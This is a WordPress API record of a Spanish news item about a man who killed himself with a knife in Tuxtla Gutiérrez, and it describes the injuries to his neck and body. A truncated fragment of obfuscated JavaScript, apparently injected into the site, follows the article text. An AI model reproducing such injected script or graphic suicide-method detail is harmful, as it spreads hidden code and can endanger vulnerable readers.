{"id":19520,"date":"2024-12-28T04:28:46","date_gmt":"2024-12-28T04:28:46","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=19520"},"modified":"2024-12-28T04:28:47","modified_gmt":"2024-12-28T04:28:47","slug":"hombre-se-quit-la-vid-con-un-cuchill","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=19520","title":{"rendered":"Hombre se quit@ la vid@ con un cuchill@"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1735360059756-1024x768.jpg\" alt=\"\" class=\"wp-image-19521\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1735360059756-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1735360059756-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1735360059756-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1735360059756.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 27 de diciembre del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este viernes por la madrugada un sujeto se quit@ la vida con un cuchill@ al interior de un domicilio ubicado en la Calle Santo Tom\u00e1s de la Colonia Adonahi de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando el sujeto de unos 38 a\u00f1os de edad entr\u00f3 en crisis y comenz\u00f3 a causarse lesiones en varias partes del cuerpo y en el cuello.<\/p>\n\n\n\n<p>Sus familiares al ver la escena llamaron a los n\u00fameros de emergencias y relataron que el sujeto estaba sangrando demasiado.<\/p>\n\n\n\n<p>Al lugar arribaron elementos de la polic\u00eda municipal y estatal.<\/p>\n\n\n\n<p>Al contactar con los familiares dieron a conocer que el sujeto se estaba deg@llando.<\/p>\n\n\n\n<p>Luego de ingresar arribaron param\u00e9dicos de Protecci\u00f3n Civil para realizar la valoraci\u00f3n y determinaron que ya habia muert@.<\/p>\n\n\n\n<p>Peritos de la Fiscal\u00eda General del Estado realizaron las diligencias correspondientes, levantaron el cuerpo y lo trasladaron al Semefo donde se practicar\u00eda la necropsia de ley.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 27 de diciembre del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este viernes por la madrugada un sujeto se quit@ la vida con un cuchill@ al interior de un domicilio ubicado en la Calle Santo Tom\u00e1s de la Colonia Adonahi de Tuxtla Guti\u00e9rrez. De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando el &hellip;<\/p>\n","protected":false},"author":2,"featured_media":19521,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-19520","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19520","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=19520"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19520\/revisions"}],"predecessor-version":[{"id":19522,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19520\/revisions\/19522"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/19521"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=19520"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=19520"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=19520"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}